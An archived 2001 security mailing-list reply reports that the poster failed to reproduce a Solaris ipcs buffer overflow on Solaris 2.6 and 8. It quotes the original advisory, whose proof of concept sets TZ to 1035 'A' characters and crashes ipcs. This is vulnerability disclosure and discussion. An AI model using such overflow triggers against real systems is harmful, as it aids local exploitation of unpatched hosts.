Re: Solaris ipcs vulnerability

From: Mike Batchelor (mikebatat_private)
Date: Mon Apr 16 2001 - 07:22:15 PDT

Next message: Tomas Kindahl: "OpenBSD 2.8 ftpd/glob exploit (breaks chroot)"

Previous message: ARAI Yuu: "Re: Solaris ipcs vulnerability"
Maybe in reply to: Marc Maiffret: "Solaris ipcs vulnerability"
Next in thread: Neil W Rickert: "Re: Solaris ipcs vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Failed to reproduce this problem on Solaris 2.6 and 8 for SPARC.  Ipcs
behaved normally, except for printing out the long string of "A"'s in the
output header where the timezone would appear.

> Solaris ipcs vulnerability
>
> Release Date:
> April 11, 2001
>
> Systems Affected:
> Solaris 7 (x86)
> Other versions of Solaris are most likely affected also.
>
> Discovered by:
> Riley Hassell rileyat_private
>
> bash-2.03$ TZ=`perl -e 'print "A"x1035'`
> bash-2.03$ /usr/bin/i86/ipcs
> IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
> Message Queue facility inactive.
> T ID KEY MODE OWNER GROUP
> Shared Memory:
> m 0 0x500004d3 --rw-r--r-- root root
> Semaphore facility inactive.
> Segmentation Fault (core dumped)

Next message: Tomas Kindahl: "OpenBSD 2.8 ftpd/glob exploit (breaks chroot)"
Previous message: ARAI Yuu: "Re: Solaris ipcs vulnerability"
Maybe in reply to: Marc Maiffret: "Solaris ipcs vulnerability"
Next in thread: Neil W Rickert: "Re: Solaris ipcs vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 12:15:38 PDT